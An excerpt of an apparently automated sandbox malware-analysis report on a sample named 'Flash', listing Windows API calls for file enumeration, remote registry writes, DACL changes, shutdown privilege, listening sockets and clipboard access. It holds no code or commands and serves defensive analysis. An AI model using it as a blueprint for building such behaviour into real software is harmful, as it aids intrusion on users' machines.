                                                        • __swprintf.LIBCMT ref: 00A3CED3
                                                        • __swprintf.LIBCMT ref: 00A3CF16
                                                          • Part of subcall function 009E1A36: _memmove.LIBCMT ref: 009E1A77
                                                        • __swprintf.LIBCMT ref: 00A3CF6A
                                                          • Part of subcall function 009F38C8: __woutput_l.LIBCMT ref: 009F3921
                                                        • __swprintf.LIBCMT ref: 00A3CFB8
                                                          • Part of subcall function 009F38C8: __flsbuf.LIBCMT ref: 009F3943
                                                          • Part of subcall function 009F38C8: __flsbuf.LIBCMT ref: 009F395B
                                                        • __swprintf.LIBCMT ref: 00A3D007
                                                        • __swprintf.LIBCMT ref: 00A3D056
                                                        • __swprintf.LIBCMT ref: 00A3D0A5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                        • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                        • API String ID: 3953360268-2428617273
                                                        • Opcode ID: aa5023a723ed2d1d8ae9078f4d872188d23a33c2161a95821e2787c06ad6c1c7
                                                        • Instruction ID: 2efe6f19900419e52cdbd708edd371fddaac912b7d714c17e48f76884e6a8192
                                                        • Opcode Fuzzy Hash: aa5023a723ed2d1d8ae9078f4d872188d23a33c2161a95821e2787c06ad6c1c7
                                                        • Instruction Fuzzy Hash: 32A13AB1444244ABC710EFA4DD85EAFB7ECAFD4704F40491AF595C2292EB74EA48CB62
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00A3F5F9
                                                        • _wcscmp.LIBCMT ref: 00A3F60E
                                                        • _wcscmp.LIBCMT ref: 00A3F625
                                                        • GetFileAttributesW.KERNEL32(?), ref: 00A3F637
                                                        • SetFileAttributesW.KERNEL32(?,?), ref: 00A3F651
                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00A3F669
                                                        • FindClose.KERNEL32(00000000), ref: 00A3F674
                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 00A3F690
                                                        • _wcscmp.LIBCMT ref: 00A3F6B7
                                                        • _wcscmp.LIBCMT ref: 00A3F6CE
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00A3F6E0
                                                        • SetCurrentDirectoryW.KERNEL32(00A8B578), ref: 00A3F6FE
                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00A3F708
                                                        • FindClose.KERNEL32(00000000), ref: 00A3F715
                                                        • FindClose.KERNEL32(00000000), ref: 00A3F727
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                        • String ID: *.*
                                                        • API String ID: 1803514871-438819550
                                                        • Opcode ID: e44718f8610894623b8b40550a02b3802f72f7a113961d0ac941783e860fea16
                                                        • Instruction ID: 6df2d17f48cfce78da47697ba6ed8e5245444ab8c0675a4f9e66af54e31d9e4c
                                                        • Opcode Fuzzy Hash: e44718f8610894623b8b40550a02b3802f72f7a113961d0ac941783e860fea16
                                                        • Instruction Fuzzy Hash: 4431D072A102096EDB10EFB4EC49EEF73BCAF09321F100165F915E20A0EB70CA85CB60
                                                        APIs
                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A50FB3
                                                        • RegCreateKeyExW.ADVAPI32(?,?,00000000,00A60980,00000000,?,00000000,?,?), ref: 00A51021
                                                        • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00A51069
                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00A510F2
                                                        • RegCloseKey.ADVAPI32(?), ref: 00A51412
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00A5141F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Close$ConnectCreateRegistryValue
                                                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                        • API String ID: 536824911-966354055
                                                        • Opcode ID: 754b2f2cf7b0083fa4eba83a8157f2d752589a1a36ef325a30bf125fe55e0417
                                                        • Instruction ID: 664d0f53f4385f39036ecc992f69358a6f5419800c380ebda129bf3a318dffb3
                                                        • Opcode Fuzzy Hash: 754b2f2cf7b0083fa4eba83a8157f2d752589a1a36ef325a30bf125fe55e0417
                                                        • Instruction Fuzzy Hash: EA0264712006019FCB14EF25C895F2AB7E5FF88724F048959F99A9B3A2CB30EC45CB91
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00A3F756
                                                        • _wcscmp.LIBCMT ref: 00A3F76B
                                                        • _wcscmp.LIBCMT ref: 00A3F782
                                                          • Part of subcall function 00A34875: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00A34890
                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00A3F7B1
                                                        • FindClose.KERNEL32(00000000), ref: 00A3F7BC
                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 00A3F7D8
                                                        • _wcscmp.LIBCMT ref: 00A3F7FF
                                                        • _wcscmp.LIBCMT ref: 00A3F816
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00A3F828
                                                        • SetCurrentDirectoryW.KERNEL32(00A8B578), ref: 00A3F846
                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00A3F850
                                                        • FindClose.KERNEL32(00000000), ref: 00A3F85D
                                                        • FindClose.KERNEL32(00000000), ref: 00A3F86F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                        • String ID: *.*
                                                        • API String ID: 1824444939-438819550
                                                        • Opcode ID: fb33e9dfd4dd9cfb7779bae2c9c899acb73207fc7d830f6a2244d8de4ce72c7f
                                                        • Instruction ID: 30169c38749fd722940b3eda8a0b3a5e314feaa50c514b5eda475fbad0f1c1b0
                                                        • Opcode Fuzzy Hash: fb33e9dfd4dd9cfb7779bae2c9c899acb73207fc7d830f6a2244d8de4ce72c7f
                                                        • Instruction Fuzzy Hash: 0531C5729002197EDB14EFB4DC49EEF77BCAF49320F104565F914A21A1DB70DE868B60
                                                        APIs
                                                          • Part of subcall function 00A28E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00A28E3C
                                                          • Part of subcall function 00A28E20: GetLastError.KERNEL32(?,00A28900,?,?,?), ref: 00A28E46
                                                          • Part of subcall function 00A28E20: GetProcessHeap.KERNEL32(00000008,?,?,00A28900,?,?,?), ref: 00A28E55
                                                          • Part of subcall function 00A28E20: HeapAlloc.KERNEL32(00000000,?,00A28900,?,?,?), ref: 00A28E5C
                                                          • Part of subcall function 00A28E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00A28E73
                                                          • Part of subcall function 00A28EBD: GetProcessHeap.KERNEL32(00000008,00A28916,00000000,00000000,?,00A28916,?), ref: 00A28EC9
                                                          • Part of subcall function 00A28EBD: HeapAlloc.KERNEL32(00000000,?,00A28916,?), ref: 00A28ED0
                                                          • Part of subcall function 00A28EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00A28916,?), ref: 00A28EE1
                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00A28931
                                                        • _memset.LIBCMT ref: 00A28946
                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00A28965
                                                        • GetLengthSid.ADVAPI32(?), ref: 00A28976
                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 00A289B3
                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00A289CF
                                                        • GetLengthSid.ADVAPI32(?), ref: 00A289EC
                                                        • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00A289FB
                                                        • HeapAlloc.KERNEL32(00000000), ref: 00A28A02
                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00A28A23
                                                        • CopySid.ADVAPI32(00000000), ref: 00A28A2A
                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00A28A5B
                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00A28A81
                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00A28A95
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                        • String ID:
                                                        • API String ID: 3996160137-0
                                                        • Opcode ID: 2aba81476e6fdaa8b1961a74c78182fe787d2bc972fb4f50c09e8974bbba0d3b
                                                        • Instruction ID: 7f20b19562720943627ec32c4a94455306e69a65b76fd3a25abe55fa34b223b4
                                                        • Opcode Fuzzy Hash: 2aba81476e6fdaa8b1961a74c78182fe787d2bc972fb4f50c09e8974bbba0d3b
                                                        • Instruction Fuzzy Hash: A4615671901219BFCF04DFA9EC85EAEBB79FF04301F04812AF815A6290DB799A45CB60
                                                        APIs
                                                          • Part of subcall function 00A5147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00A5040D,?,?), ref: 00A51491
                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A50B0C
                                                          • Part of subcall function 009D4D37: __itow.LIBCMT ref: 009D4D62
                                                          • Part of subcall function 009D4D37: __swprintf.LIBCMT ref: 009D4DAC
                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00A50BAB
                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00A50C43
                                                        • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00A50E82
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00A50E8F
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                        • String ID:
                                                        • API String ID: 1240663315-0
                                                        • Opcode ID: d05b9ba5cb5df98a782560e4319992858b5ab18e77bd0f9f14e7333968e734df
                                                        • Instruction ID: c02a5676a4abba8121ae64714eb6a30f0e6246146c89bab2247ff25913581ca7
                                                        • Opcode Fuzzy Hash: d05b9ba5cb5df98a782560e4319992858b5ab18e77bd0f9f14e7333968e734df
                                                        • Instruction Fuzzy Hash: A9E15831204210AFCB14DF69C995E2ABBF9FF89314F14896DF84ADB2A1DA30ED05CB51
                                                        APIs
                                                        • __swprintf.LIBCMT ref: 00A34451
                                                        • __swprintf.LIBCMT ref: 00A3445E
                                                          • Part of subcall function 009F38C8: __woutput_l.LIBCMT ref: 009F3921
                                                        • FindResourceW.KERNEL32(?,?,0000000E), ref: 00A34488
                                                        • LoadResource.KERNEL32(?,00000000), ref: 00A34494
                                                        • LockResource.KERNEL32(00000000), ref: 00A344A1
                                                        • FindResourceW.KERNEL32(?,?,00000003), ref: 00A344C1
                                                        • LoadResource.KERNEL32(?,00000000), ref: 00A344D3
                                                        • SizeofResource.KERNEL32(?,00000000), ref: 00A344E2
                                                        • LockResource.KERNEL32(?), ref: 00A344EE
                                                        • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00A3454F
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                        • String ID:
                                                        • API String ID: 1433390588-0
                                                        • Opcode ID: ea710ae76fe41f107411a75f6e4ae8a794a9f825280b3d99d1f583b0156dd374
                                                        • Instruction ID: 2326740223e97bba4faa2f65d7837af696ab2770ee5391a5cca44c2049e5b3c9
                                                        • Opcode Fuzzy Hash: ea710ae76fe41f107411a75f6e4ae8a794a9f825280b3d99d1f583b0156dd374
                                                        • Instruction Fuzzy Hash: FD318F71A0121AABDB15DFA0ED58EBB7BB8EF08341F044425FA16D6150DB74EE52CBB0
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                        • String ID:
                                                        • API String ID: 1737998785-0
                                                        • Opcode ID: 6a9973d1c5340ef5b17d1219c7a3996c1dbcd34b0d7049d40af107d6c6ae73f9
                                                        • Instruction ID: 21e6cf3e1a7acaeb4e408847d044ef518bf8b27696f998ac8482cf03feaa2b07
                                                        • Opcode Fuzzy Hash: 6a9973d1c5340ef5b17d1219c7a3996c1dbcd34b0d7049d40af107d6c6ae73f9
                                                        • Instruction Fuzzy Hash: 3421A7392412109FEB11EFA4EC59F6E77B9EF88711F018015F9069B2A2DBB0AD51CB54
                                                        APIs
                                                          • Part of subcall function 009E1A36: _memmove.LIBCMT ref: 009E1A77
                                                        • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00A3FA83
                                                        • FindClose.KERNEL32(00000000), ref: 00A3FB96
                                                          • Part of subcall function 009D52B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 009D52E6
                                                        • Sleep.KERNEL32(0000000A), ref: 00A3FAB3
                                                        • _wcscmp.LIBCMT ref: 00A3FAC7
                                                        • _wcscmp.LIBCMT ref: 00A3FAE2
                                                        • FindNextFileW.KERNEL32(?,?), ref: 00A3FB80
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Find$File_wcscmp$CloseFirstMessageNextPeekSleep_memmove
                                                        • String ID: *.*
                                                        • API String ID: 2185952417-438819550
                                                        • Opcode ID: 7c974d549c6ee5015282dc75add2edcfddd0b207ff56fbbada29825aad35e632
                                                        • Instruction ID: 27fff97b36bc21633d350687119e5b7a036bcd3abc9f85fc295bb6b0dfd62377
                                                        • Opcode Fuzzy Hash: 7c974d549c6ee5015282dc75add2edcfddd0b207ff56fbbada29825aad35e632
                                                        • Instruction Fuzzy Hash: B8419FB1D1020AAFCF15DFA4CC59AEEBBB5FF05350F148566F814A22A1EB309E84CB50
                                                        APIs
                                                          • Part of subcall function 00A29399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00A293E3
                                                          • Part of subcall function 00A29399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00A29410
                                                          • Part of subcall function 00A29399: GetLastError.KERNEL32 ref: 00A2941D
                                                        • ExitWindowsEx.USER32(?,00000000), ref: 00A357B4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                        • String ID: $@$SeShutdownPrivilege
                                                        • API String ID: 2234035333-194228
                                                        • Opcode ID: 98d36d3e88e26c35ba822a4d1e4487b8c3a7cbc4b8f615f72695749f2b09658f
                                                        • Instruction ID: 26f32b8ae4b6bdffccb9a9ca4dcebef008db7c654c5e7696f0b895ae6aecb5e0
                                                        • Opcode Fuzzy Hash: 98d36d3e88e26c35ba822a4d1e4487b8c3a7cbc4b8f615f72695749f2b09658f
                                                        • Instruction Fuzzy Hash: 4C01D631F55712EBE728A3BDDC8BFBB7668EB05751F240D29F913D60D2EA905C008560
                                                        APIs
                                                        • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00A469C7
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00A469D6
                                                        • bind.WSOCK32(00000000,?,00000010), ref: 00A469F2
                                                        • listen.WSOCK32(00000000,00000005), ref: 00A46A01
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00A46A1B
                                                        • closesocket.WSOCK32(00000000,00000000), ref: 00A46A2F
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$bindclosesocketlistensocket
                                                        • String ID:
                                                        • API String ID: 1279440585-0
                                                        • Opcode ID: e134f0804ad0ab02434da93d4c4af244ceca0d1f85aadd5d2b4693c9677c97e2
                                                        • Instruction ID: be7495b6da5445af7de421b6f2473afd303b2fc94e0dfe769bc0afecdbb2584c
                                                        • Opcode Fuzzy Hash: e134f0804ad0ab02434da93d4c4af244ceca0d1f85aadd5d2b4693c9677c97e2
                                                        • Instruction Fuzzy Hash: CE21D2342406009FCB10EFA8D949F6EB7B9EF85720F108559E816A73D1CB70AC41CB91
                                                        APIs
                                                          • Part of subcall function 009D29E2: GetWindowLongW.USER32(?,000000EB), ref: 009D29F3
                                                        • DefDlgProcW.USER32(?,?,?,?,?), ref: 009D1DD6
                                                        • GetSysColor.USER32(0000000F), ref: 009D1E2A
                                                        • SetBkColor.GDI32(?,00000000), ref: 009D1E3D
                                                          • Part of subcall function 009D166C: DefDlgProcW.USER32(?,00000020,?), ref: 009D16B4
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: ColorProc$LongWindow
                                                        • String ID:
                                                        • API String ID: 3744519093-0
                                                        • Opcode ID: b11ed067a12c3e4ea8f9e557819a52398a2366b040481940d914355dcbc1ecf5
                                                        • Instruction ID: 3be48041af3afe1c370d66e0d332c150ff22a105b47df8f630e8c0ec576c377b
                                                        • Opcode Fuzzy Hash: b11ed067a12c3e4ea8f9e557819a52398a2366b040481940d914355dcbc1ecf5
                                                        • Instruction Fuzzy Hash: C8A16A721A5608BEE62CAF696E49E7F369EEF41302F15C50BF442D63D1CB289D02C275
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00A3C329
                                                        • _wcscmp.LIBCMT ref: 00A3C359
                                                        • _wcscmp.LIBCMT ref: 00A3C36E
                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00A3C37F
                                                        • FindClose.KERNEL32(00000000,00000001,00000000), ref: 00A3C3AF
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Find$File_wcscmp$CloseFirstNext
                                                        • String ID:
                                                        • API String ID: 2387731787-0
                                                        • Opcode ID: b9a7e33327e7bad403a14abb0c39e6d68a59f8a069b9d3e466013c6490e65a7c
                                                        • Instruction ID: c4247d1630eb0995135e7a23356f634c64457915271bb72a552c97df95ff1a89
                                                        • Opcode Fuzzy Hash: b9a7e33327e7bad403a14abb0c39e6d68a59f8a069b9d3e466013c6490e65a7c
                                                        • Instruction Fuzzy Hash: 0B517A756046029FC714DF68D890EAAB3E8FF89320F10861DF9569B3A1DB30ED05CB91
                                                        APIs
                                                          • Part of subcall function 00A48475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00A484A0
                                                        • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00A46E89
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00A46EB2
                                                        • bind.WSOCK32(00000000,?,00000010), ref: 00A46EEB
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00A46EF8
                                                        • closesocket.WSOCK32(00000000,00000000), ref: 00A46F0C
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
